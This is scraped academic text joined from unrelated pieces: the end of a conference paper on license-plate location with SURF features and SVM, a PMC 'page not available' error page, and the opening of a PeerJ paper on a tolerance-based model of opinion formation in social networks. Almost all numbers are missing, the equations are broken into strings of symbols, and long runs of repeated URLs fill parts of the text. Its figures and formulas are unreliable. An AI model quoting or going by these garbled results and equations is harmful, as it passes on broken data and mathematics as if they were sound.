each color channel. each area can be expressed into a - dimensional vector .regional color of the computation formula is as follows: )()( )()( ),min(),( ji jjii t n k k j k ijicolour rsizersize crsizecrsize c ccrrs       ( ) ) texture similarity. to calculate gaussian differential for each color channel of eight different direction. the normalized image acquires bins in the histogram for each channel and for each color. making areas represent a - dimensional vector . computation formula is as follows:    n k k j k ijitexture ttrrs ),min(),( ( ) )( )()( ),( imsize rsizersize rrs ji jisize   ( ) ) size similarity. refers to the number of pixels of similarity in the region. small area for priority merger. computation formula is as follows: ) consistent with similarity. refers to the marked rectangle the smaller alignment is higher for the combined area. the calculation is as follows: )( )()()( ),( imsize rsizersizebbsize rrfill iiij ji   ( ) to combine the calculated four kinds of similarity. similar set is s .formula is as follows: ),(),( ),(),(),( jifilljisize jitexturejicolourji rrsarrsa rrsarrsarrs   ( ) the   ,  i a .finding the similarity of the two biggest area is i r and j r from s that is similarity of collection. merging it into a region t r ,as well as dividing calculation of similarity that is in i r and j r between neighboring areas in s that is a collection. calculate t r generated area and its adjacent area of similarity, and added to the similarity of set s . t r is added to the collection area r and use rectangular box to mark area. the suspicious area is extracted by using the algorithm for vehicle image as shown in figure . international conference on sensor network and computer engineering (icsnce ) figure . the suspicious area extraction b. the location of license plate ) putting the pixels in the image into type ( ).the hessian matrix on dimension can be got such as type ( ). among is convolution results that is gaussian filtering second derivative. and above meaning. gaussian filter function such as type ( );            ),(),( ),(),(   xlxl xlxl h yyxy xyxx ( ) ) on the original image, by expanding the size of the box to form the different scales of image pyramid. for example * box value of the filter template as shown in figure .the grey part template value is .corresponding to the second order gauss filter is= . .is the scale of the corresponding values. after the convolution of the value of , ,.get f of hessian matrix expression is as follows: ) . ( xyxyxx dddh  ( ) (a)x direction (b)y direction (c)xy direction figure . * filtering template ) building scale image pyramid. in every order, the four layers of the scale of the image is chosen. the four order of building of parameters as shown in figure .the grey number is the size of the filter template the box. if the image size is greater than the template size, we need to continue to increase the order. such as the size of the filter template for n * n. the scale of the corresponding is n/s = . * ;using hessian matrix to calculate the extremum, and then in the * * within the territory of three-dimensional take non-maximum suppression. when has compared to last scale, the next scale and the scale of around field values are big or hours, there are candidate features. in the scale space and image space take a interpolation arithmetic. get the stable feature points international conference on sensor network and computer engineering (icsnce ) location and the dimension values. figure . the filter size of octave ) with feature points as the center, s is the scale value of the feature points. for calculating radius of s points in the field in the x and y direction harr wavelet response. and giving the response value assigned a gaussian weight coefficient, this allows the response contribution near the feature point is big , away from the feature point is small. adding the degrees within the scope of the response to form a new vector. traverse the entire circle area, selecting the longest vector for the feature points in the direction of the principal direction. as shown in figure . ) rotating coordinate axis to the main direction. according to the main direction to choose side length of s square area. the window area was divided into * sub area. computing wavelet response in each area s * s within the scope. forand. as shown in figure .each subregion of response and the absolute value of response together to form  xd ,  yd ,  xd ,  yd .in each subdomain form d weight o f vector =( xd 、 yd 、  xd 、 yd ).so each feature point is * * = dimension of description of the vector. and then to vector normalization. the extraction results as shown in figure . figure . generate surf feature points figure . surf feature points surf feature points are extracted. using the k - means clustering algorithm to generate visual word package. [ ] all surf feature points' samples extracted in the training library are     mxx ,..., , each    i x . the generation process is as follows: a) then select cluster centroid point are ,,...,,  k  ; b) to calculate each sample i should belong to the class that is   minarg: j i j i xc  , recalculating each type j  of the centroid        m i i m i ii j jc xjc )( )()( }{ }{ : is until convergence. the training of the classifier. using visual word package to express the picture of the training set. that is to say, extracting surf feature points of images and mapping it to the corresponding word package. to generate the code of the picture. inputting into svm to take training, the process is as follows: a) gaving each sample    i x mark i y . license plate sample tagged value is .the license tag of value is - ; b) to select the gaussian kernel function as a conversion function that cast onto the n dimensional vector. selecting its  value control the dimension of the projection. selection of penalty factor c is to optimize decision surface; c) all the sample are substituted into type ( )and to calculation, get the classification of the decision function in the form below: } {min ,    n i i c   , iii bxy   , i ( ) in the recognition phase, through visual word package said the image into vector form. using the trained svm classifier to classify its license plate images .locating the license plate location. iii. conclusion aimed at the phenomenon of laminated object in the image, using based on graph search algorithm to obtain the suspicious area of vehicle license plate in the image. international conference on sensor network and computer engineering (icsnce ) extracting its feature points of surf for coarse positioning of the rectangular profile area. according to generated bag of visterms represented the candidate images as codebook . using decisions classification function are obtained by training svm to classify rectangular area, locating the license plate. this method have higher recognition rate and anti-jamming is strong under complex background. the collection of photos of the result: its accuracy is pieces, accuracy is . %, has the strong robustness. references [ ] zhiqiang li, yongbin li. the development and research status of license plate recognition technology. science&technology information, , : - . [ ] geng qing-tian, zhao hong-wei. license plate recognition based on fractal and hidden markov feature. optics and precision engineering, , ( ): - [ ] qin zhong, shi sheng li, xu jianmin et al. method of license plate location on comer feature[c]//proceeding of the th world congress on intelligent control and automation piscataway, nj, usa: ieee, press, : - [ ] guo z q, wang y j, dong z, et al. license plate detection method base on paired morphological operator[c]//proceeding of the th national conference on image and graphics. beijing: tsinghua vniversity press, , - . [ ] zhang yin, pan yunhe. a new approach for vehicle license plate locating from color image[j]. journal of image and graphics. , ( ): - . [ ] zheng l h, he x j, samali b, et al. an algorithm for accuracy enhancement of license plate recognition[j]. journal of computer and system sciences, , ( ): - . [ ] qiwei wang, shouhong wan, lihua yue, che wang. visual attention based bag-of-words model for image classification. sixth international conference on digital image processing. [ ] corinna cortes, vladimir vapnik. support-vector networks. machine learning, , ( ): - [ ] he chunhua , zhang xuefei , hu yingchun. a study on the improved algorithm for sobel on image edge detection. opticaltechnique, , ( ): [ ] a.bolovinou, i.pratikakis, s.perantonis. bag of spatio-visual words for context inference in scene classification[j]. pattern recognition . , ( ): - http://www.cnki.net/kcms/detail/detail.aspx?filename=sjes &dbcode=ssjd&v= http://www.cnki.net/kcms/detail/detail.aspx?filename=sjes &dbcode=ssjd&v= wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks submitted august accepted december published january corresponding author mihai udrescu, mudrescu@cs.upt.ro, mudrescu@gmail.com academic editor filippo menczer additional information and declarations can be found on page doi . /peerj-cs. copyright topirceanu et al. distributed under creative commons cc-by . open access tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks alexandru topirceanu , mihai udrescu , mircea vladutiu and radu marculescu department of computer and software engineering, politehnica university timisoara, timisoara, romania department of electrical and computer engineering, carnegie mellon university, pittsburgh, pa, united states abstract one of the main motivations behind social network analysis is the quest for un- derstanding opinion formation and diffusion. previous models have limitations, as they typically assume opinion interaction mechanisms based on thresholds which are either fixed or evolve according to a random process that is external to the social agent. indeed, our empirical analysis on large real-world datasets such as twitter, meme tracker, and yelp, uncovers previously unaccounted for dynamic phenomena at population-level, namely the existence of distinct opinion formation phases and social balancing. we also reveal that a phase transition from an erratic behavior to social balancing can be triggered by network topology and by the ratio of opinion sources. consequently, in order to build a model that properly accounts for these phenomena, we propose a new (individual-level) opinion interaction model based on tolerance. as opposed to the existing opinion interaction models, the new tol- erance model assumes that individual’s inner willingness to accept new opinions evolves over time according to basic human traits. finally, by employing discrete event simulation on diverse social network topologies, we validate our opinion interaction model and show that, although the network size and opinion source ratio are important, the phase transition to social balancing is mainly fostered by the democratic structure of the small-world topology. subjects network science and online social networks, scientific computing and simulation, social computing keywords social networks, opinion diffusion, phase transition, discrete event simulation, tolerance introduction social network analysis is crucial to better understand our society, as it can help us observe and evaluate various social behaviors at population level. in particular, understanding the social opinion dynamics and personal opinion fluctuation (golbeck, ; geven, weesie & van tubergen, ; valente et al., ) plays a major part in fields like social psychology, philosophy, politics, marketing, finances and even warfare (easley & kleinberg, ; pastor-satorras & vespignani, ; fonseca, ). indeed, the dynamics of opinion fluctuation in a community can reflect the distribution of socially influential people across that community (kempe, kleinberg & tardos, ; hussain et al., ; muchnik, aral & how to cite this article topirceanu et al. ( ), tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks. peerj comput. sci. :e ; doi . /peerj-cs. mailto:mudrescu@cs.upt.ro mailto:mudrescu@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. taylor, ); this is because the social influence is the ability of individuals (agents) to influence others’ opinion in either one-on-one or group settings (maxwell, ; wang & chen, ; mcdonald & wilson, ). without social influence, the society would have an erratic behavior which would be hard to predict. existing studies on opinion formation and evolution (axelrod, ; riolo, cohen & axelrod, ; acemoglu et al., ; yildiz et al., ; valente et al., ; hussain et al., ; guille et al., ; ruan et al., ) rely on the contagion principle of opinion prop- agation. however, such studies offer limited predictability and realism because they are generally based on opinion interaction models which use either fixed thresholds (deffuant et al., ; javarone & squartini, ), or thresholds evolving according to simple prob- abilistic processes that are not driven by the internal state of the social agents (fang, zhang & thalmann, ; deng, liu & xiong, ). to mitigate these limitations, we reveal new dynamical features of opinion spreading. the consistent and recurring real-world observations are then explained by introducing a new social interaction model which takes into account the evolution of individual’s inner state. we finally validate the proposed model by analyzing empirical data from yelp, twitter and memetracker, and by using our opinion dynamics simulation framework—socialsim (topirceanu & udrescu, )— socialsim is available at cs.upt.ro/∼ alext/socialsim. which includes multiple complex topological models, as well as customizable opinion interaction and influence models. consequently, our main contributions are threefold: . identification of four distinct phases in opinion formation: this aspect is not entirely captured by existing models (sznajd-weron & sznajd, ; li et al., ; acemoglu et al., ; chen, wang & li, ; guille et al., ; fang, zhang & thalmann, ) although previous research (hołyst, kacperski & schweitzer, ) has noticed that there are some stages in opinion evolution. we argue that the succession of opinion formation phases is critical to the social balancing phenomenon (i.e., the general opinion becomes stable despite constant local oscillations). we also identify a phase transition from an unstable opinion to social balancing which is related to the dynamics of opinion formation phases. . modeling opinion dynamics: we propose a new graph and threshold based interaction model with stubborn agents (sa) (acemoglu & ozdaglar, ) which is able to reproduce the phenomena that we observe in real-world datasets. inspired by social psychology, our new model assumes that individual’s willingness to accept new opinions (i.e., tolerance) changes over time according to his/her inner state. . validation of the newly proposed tolerance model via our discrete-event simulator socialsim (topirceanu & udrescu, ). the analysis we provide reveals the deep connection between social balancing and the relevant parameters of social networks such as network size, topology, and opinion source ratio (i.e., stubborn agents distribution)(acemoglu et al., ); this correlates well with our empirical observations on large social networks. taken together, these new contributions show that opinion dynamics in social networks exhibit specific patterns that depend on network size and ratio of stubborn agents (which topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://cs.upt.ro/~alext/socialsim http://dx.doi.org/ . /peerj-cs. we consider to be opinion sources), as well as underlying network topology. consequently, our findings can be used to improve our understanding of opinion formation and diffusion in social networks, and predictability of social dynamics. methods our empirical analysis is based on three full datasets from the snap online collection and datasets available online at: https://snap. stanford.edu/data/volumeseries.html. yelp, which contain opinion fluctuation data with time information. dataset available online at: https://www. yelp.com/dataset challenge/dataset. the yelp dataset: contains graded ( – stars) user reviews of american businesses, each with a timestamp. one can obtain insights on the popularity of a business at a given time. the usable information is the number of reviews at a given moment in time (interpreted as network size of individuals with an opinion), the average grade in time (the average opinion over time), and the number of votes to each review (ratio of agents with strong or “stubborn” opinions, because when an agent votes, his opinion is already made up). the dataset contains , users, , businesses and , , reviews. out of this data, we processed and filtered businesses with at least reviews (i.e., we need a significant number of reviews for a relevant dynamical analysis). as such, we obtained , businesses for further analysis. memetracker and twitter hashtags with time information from the stanford large network dataset collection (snap); which contain the history (repost rate in time) of diverse, popular hashtags. we can use this data to analyze the evolution of a particular opinion in time. memetracker phrases are the , highest total volume phrases among million phrases collected within – . twitter hashtags are the , highest total volume hashtags among million hashtags from jun–dec . we filtered the twitter and memetracker data so that only the memes or hashtags which can be related to opinions remain, e.g., we have excluded those related to rare events like natural disasters. as such, we rendered a number of re-tweets and hashtags for further processing. discrete simulation methodology we test and validate our new opinion interaction model based on tolerance with the java-based opinion dynamics simulator socialsim (topirceanu & udrescu, ). like any discrete event simulation, we define the salient properties of the experimental setup which was used to obtain the simulation results. events are synchronized by the simulation clock; we call the period of this clock a simulation day. one day is a simulation period in which agents can interact with their neighbors. however, an agent does not inter- act daily; in fact, each agent picks a random number of days to be inactive after each active day. in our simulation, we use a random timeout interval between day and days. only after this time has elapsed, will an agent interact again with one random neighbor. after that interaction, the agent will again choose to be inactive for a random period of days. results by analyzing data on opinion evolution using twitter and memetracker hashtags, as well as user reviews and votes for local businesses from yelp, we identify unique temporal patterns in all these datasets. when defining phases of opinion dynamics, we are tracking topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset http://dx.doi.org/ . /peerj-cs. the opinion change of the social networks, denoted as ω. for yelp there is a clear link between the opinion state of the participants (denoted as s) and the number of stars awarded by the users. we also assume that yelp users are agents in a social network with a typical structure; this underlying social network influences opinion dynamics in yelp. as such, opinion change is simply the variation in time of the stars awarded by users: ω = s(t) − s(t − ). for the twitter and memetracker datasets, we interpret the number of replies as a proxy for opinion strength, e.g., more replies indicate a stronger opinion. when previously unopinionated people reply or re-tweet, they do so because they have formed a clear opinion on a particular subject (say, reflected in a hashtag) and they feel the need to express it publicly. as such, the assumption is that we can interpret the change in the number of people that retweet or reply to a hashtag as representing the opinion change ω. opinion formation phases and social balancing using the yelp context, we explain how the opinion formation phases (i-initiation, f-fusion, t-tolerance and t-intolerance) are detected. for each business, we have automatically detected all spikes in the number of total votes (interpreted as opinion sources which never change their state, or stubborn agents sa) and have corroborated these with the point at which the state (average stars) has a variation of less than star between maximum and minimum stars awarded. the reason behind considering the variation interval is that star is the psychological threshold represented by the unit of measurement. using an algorithmic explanation, we describe the pseudocode for detecting three points of interest—a (start of convergence of state), b (spike in sa concentration just before the convergence of state), c (spike in opinion change just after the spike in sa). find tb so that: maximum (s(k))-minimum(s(k))< for all tb ≤ k < tmax assign b(tb, s(tb)) algorithm : detecting b: start of convergence in stars on ox-axis find spike[ ] := list of all local maximums in the number of total votes find spike[ta] so that: ta < tb (last spike before tb) assign a(ta, sa(ta)) algorithm : detecting a: spike in sa just before convergence of stars find spike[ ] := list of all local maximums in the opinion change find spike[tc ] so that: tb < tc (first spike after tb) assign c(tc, ω(tc)) algorithm : detecting c: spike in opinion change just after spike in sa topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. by automatically performing this methodology on all , businesses, we find that the average distance between the closest spike on the time axis ox (point a in the example from fig. ) which occurred before the convergence of stars (i.e., point b in fig. , where the variation of awarded stars becomes lower than star) is dconv = . time units. distance dconv is relatively small with respect to the observation interval of time units or days, suggesting the fact that spikes in sa trigger a (shortly delayed) convergence of stars. further, we show that the spike in sa (point a) also triggers a maximum spike in the opinion change (point c). by running this methodology on all businesses, we obtain an average distance between the spike in sa and maximum spike in opinion change of dfusion = . time units. these statistical results support the fact that spikes in sa trigger a maximum spike in opinion change. moreover, when we corroborate the average delays between the spike in sa and spikes in stars and opinion change, namely . and . time units, we can conclude that the convergence of opinion and the fusion phase are distanced, on average, by only dcorr = . time units. backed up by this data, we can admit that the convergence of opinion (point b) and the triggering of the fusion phase (point c) are closely correlated. apart from the above statistical analysis, in order to improve the readability of our insight, we also present an illustrative example. as such, in fig. , the phase transition happens at ox = (point a) as the spike in the total votes (green line) coincides with a delayed stabilization (point b at ox = ) of the average stars awarded (blue line). the triggered spike in opinion change is marked with point c (at ox = ). we also extend our interpretation of yelp dynamics in terms of opinion change ω by presenting some relevant examples from twitter and memetracker datasets. figure illustrates a few cases of memes that can be related to users opinion about, for instance, beyonce’s song (“single ladies put a ring on it”), a movie (“where the wild things are”), or the significance of elections outcome (#iranelections). inspired by a similar approach on twitter data (lehmann et al., ), we have conducted a statistical analysis on all three datasets. using all datasets from twitter ( , hashtags), memetracker ( , keywords) and yelp ( , businesses) we have algorithmically detected the following characteristic phases in the opinion dynamics: . fusion ( nd phase) is the spike centered around the previously detected point c(tc,ω(tc)) with tc being the time projection and ω(tc) the corresponding opinion change of point c. for convenience, we will refer to the local spike in opinion change ω(tc) as fs (fusion spike). . initiation ( st phase): starting from time k = (on ox-axis), find ≤ k < tc so that ω(k) < . · fs and ω(k + ) > . · fs. in other words, time k represents the first point at which the opinion change ω exceeds % of the fusion spike fs. we have used this threshold value because it represents the half amplitude of the fusion phase, which it precedes. . intolerance ( th phase): starting from time k = tmax (the highest registered time on the oy-axis), find tc < k < tmax so that ω(k) < . · fs and ω(k − ) > . · fs. in topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure representative example for the evolution of reviews count and reviews votes for a popular businesses on yelp. (a) the ratio of review votes with respect to the review count, represented with the green line, is interpreted as stubborn agent sa (or opinion source) concentration. (b) the average user defined popularity of the respective business over the same period of time represents the state of the social network. (c) the variation of the stars (blue) is represented with orange and it is interpreted as the participants opinion change ω. point a depicts the sa concentration which triggers the delayed convergence in opinion (point b), and spike in opinion change (point c). in this example we have a(ox = ), b(ox = ), c(ox = ), d = , d = . topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure evolution of replies/retweets (opinion change ω) for some representative hashtags containing user-expressed opinion from: (a) meme- tracker. both tags and exhibit the fusion phase (f) (opinion spike), then they slowly converge towards intolerance (t). tag exhibits a second spike after the f phase, then enters the intolerance phase. (b) twitter. tag exhibits the fusion phase f (first opinion spike), then oscillates during the tolerance phase (t) keeping social balance. tag shows an example of convergence towards the intolerance phase, as social balancing does not occur. other words, time k represents the first point, from end to beginning of time, at which ω exceeds % of the fusion spike. we consider that a social network reaches intolerance if tolerance θ < . , so we use the % threshold for opinion change. any higher than %, and opinion change is still in the tolerance phase, any lower, and opinion change is likely to converge towards . . tolerance ( rd phase): starting from time k = tc + (start of social balance), find tc < k < tmax so that ω(k) > . · fs and ω(k + ) < . · fs (end of social balance). in other words, time k represents the point at which ω decreases below the % threshold which we consider a transition into the intolerance phase. figure displays the popularity of two hashtags on memetracker and twitter, expressed as posts/time evolution (posts are replies and tweets). based on the observed fluctuations, topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we identify the following phases in opinion formation: an initiation phase (i) when new opinions are injected into the social network and the number of replies starts to increase rapidly; a fusion phase (f) when the opinion dynamics reaches a maximum and different opinions start to collide; a tolerance phase (t) which represents a fluctuating yet convergent behavior; and, occasionally, an intolerance phase (t) when the fluctuations of opinion decrease and converge towards zero. based on network topology and/or ratio of opinion sources, the diffusion process may reach the fourth phase of intolerance. opinion sources, or stubborn agents (acemoglu, ozdaglar & yildiz, ; acemoglu et al., ), are agents within the social network (i.e., twitter or yelp users) who try to instill a certain opinion by influencing their peers; they are represented by those people within the network who hold strong opinions that do not change over time. the concentration of opinion sources is expressed as their ratio relative to the entire population. additionally, the analysis of twitter and memetracker results in fig. shows that all tags exhibit a clear f phase (first spike). in fig. b, tag converges towards intolerance (t phase), while tag enters a balanced oscillation (t phase) which supports the empirical observation of a phenomenon that we call social balancing, i.e., oscillations at microscopic scale of individuals opinion become stable and predictable at the macroscopic scale of the society. as such, social balancing is defined as the succession of i − f − t phases, whereas social imbalance occurs if either the society does not reach t or, after reaching t, it decays into a t phase. for example, tag (#iranelections) in fig. b has a shorter, more abrupt oscillation. in this case, we consider that the number of opinion sources is not high enough (i.e., above a critical threshold) for social balancing to happen. tag is an example of social imbalance with a decisive crystallization of just one opinion, as there is no t phase. the averages of opinion change obtained for each considered dataset and for each phase are the following (their representation is given in fig. ). within square brackets are the minimum, maximum and standard deviation for each statistical average: • twitter: initiation starts at ox = and ends and ox = [ , , . ], and has an average amplitude oy = % [ %, %, . ]. fusion happens at ox = and has an amplitude of % (i.e., it represents the maximum spike). tolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ]. intolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ]. • memetracker: initiation starts at ox = and ends and ox = [ , , . ], and has an average amplitude oy = % [ %, %, . ]. fusion happens at ox = and has an amplitude of % (i.e., it represents the maximum spike). tolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ]. intolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ]. • yelp (all measurements are translated to the left on the time axis so that t = coincides with the spike in sa, namely point a): initiation starts at ox = and ends and ox = [ , , . ], and has an average amplitude oy = . [ . , . , . ] stars. fusion topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the four opinion formation phases represented in terms of: normalized amplitude (number of tweets/maximum number of tweets or opinion change in yelp/maximum opinion change in stars), with each bar-plot depicting the minimum, maximum and average variation of opinion change; and time duration (on ox time-axis), with each horizontal bar depicting the minimum, maximum dura- tions of the phase (gray), and the time at which it occurs on average (orange). all datasets indicate the same shape of opinion dynamics and the same succession of phases: i-initiation, f-fusion, t-tolerance and t-intolerance. happens at ox = [ , ] and has an amplitude of oy = . [ . , . ] stars. tolerance starts on average at ox = [ , ], and has an average amplitude oy = . [ . , . ] stars. intolerance starts on average at ox = [ , end of time series], and has an average amplitude oy = . [ . , . ] stars. by corroborating the four obtained intervals, and also by analyzing the shapes rendered in fig. , on both the ox axis (time axis) and oy axis (opinion change), we can conclude that the four phases recurrent in all datasets and, indeed, representative for opinion formation. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. phase transition with data from yelp, we show the effects of a phase transition from social instability to social balancing which can occur when a critical concentration of opinion sources is reached in a social network. figure highlights the fact that opinion (i.e., the stars given by users to a particular business) stabilizes only after reaching a critical ratio of opinion sources (i.e., votes representing strong opinions). this can be viewed in fig. at time point ox = . we interpret this phenomenon as a rise beyond a σ threshold for the concentration of opinion sources, which determines the social balancing, i.e., the average opinion stabilizes despite of opinion oscillations at local level. corroborating all these empirical observations with the statistical analysis, we can state that twitter and memetracker illustrate a responsive type of behavior, i.e., an immediate evolution towards the f phase, so a high opinion change is quickly reached for a relatively small ratio σ of opinion sources. this behavior, in turn, correlates well with another study which shows that twitter online networks have a strong random and small-world component (duma & topirceanu, ). in contrast, the yelp dataset can be associated with a saturated type of behavior, as the ratio σ (relative to the maximum number of votes) needed to trigger the phase transition towards social balancing is high in all three cases. balancing does not occur until a high concentration of opinion sources (we interpret them as similar to opinion-influencing “stubborn agents” (acemoglu et al., ) or “blocked nodes” (ruan et al., )) are inserted into the social network. new tolerance-based opinion model this section analyzes the characteristics of a new opinion model that can reproduce this kind of real-world phenomena, i.e., the four opinion formation phases and phase transition towards social balancing. our interaction model is tested on synthetic networks and compared to the empirical data—introduced in the previous section—through qualitative means. in terms of network structure, our analysis includes the basic topologies such as mesh, random (erdös & rényi, ), small-world (watts & strogatz, ), and scale-free networks (barabási & albert, ). also, based on the last decade of research on realistic social network topology generation which either adds the small-world property to scale-free models (holme & kim, ; fu & liao, ; li, qian & wang, ), or adds a power-law degree distribution to the small-worlds (jian-guo, yan-zhong & zhong-tuo, ; chen, zhang & huang, ; wang & rong, ; zaidi, ), we also consider the watts–strogatz with degree distribution (wsdd) (chen, zhang & huang, ). in terms of opinion dynamics, we rely on a predictive opinion interaction model that can be classified as being graph- and threshold-based (guille et al., ). generally speaking, previous models use fixed thresholds (javarone & squartini, ; biswas et al., ; li et al., ; das, gollapudi & munagala, ; li et al., ) or thresholds extracted from real-world examples (galuba et al., ; saito et al., ). however, there are a few models which use dynamic thresholds (fang, zhang & thalmann, ; deng, liu & topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. xiong, ; li et al., ), but their evolution is not driven by the internal states of the social agents. on the other hand, our empirical references (i.e., twitter, memetracker and yelp) indicate that opinion does not cease to oscillate and consensus is a rare case in real world. therefore, we propose an opinion interaction model based on stubborn agents, because it assumes that the society does not reach consensus. based on recent research on stubborn agents which use a discrete (yildiz et al., ) or continuous (acemoglu et al., ) representation of opinion, we integrate the following opinion models: one-to-one (simple 